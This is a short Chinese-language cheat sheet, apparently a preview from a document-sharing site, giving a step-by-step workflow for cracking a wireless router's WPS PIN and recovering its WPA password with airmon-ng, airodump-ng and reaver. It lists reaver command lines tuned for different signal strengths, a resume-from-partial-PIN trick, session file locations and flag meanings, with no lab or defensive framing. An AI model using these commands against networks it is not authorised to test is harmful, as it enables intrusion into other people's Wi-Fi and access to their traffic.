一、激活监听模式:
airmon-ng start wlan0
二、查看周边AP信息(抓包):
airodump-ng mon0
三、按Ctrl+C终止抓包
四、 抓PIN码:
reaver -i mon0 -b MAC -vv
信号非常好:
reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1
信号普通:
reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1
信号一般:
reaver -i mon0 -b MAC -a -S -vv -c 1
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密
p参数:-p PIN可以让你在获取到PIN的情况下,直接得到路由WPA密码!
reaver -i mon0 -b MAC -p PIN
这个命令是指定PIN码,获得WPA 密码:※脱※敏※
1.3版:/etc/reaver/MAC地址.wpc
1.4版:/usr/local/etc/reaver/MAC地址.wpc
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
本内容试读结束,登录后可阅读更多
下载后可阅读完整内容,剩余1页未读,立即下载
- 1
- 2
前往页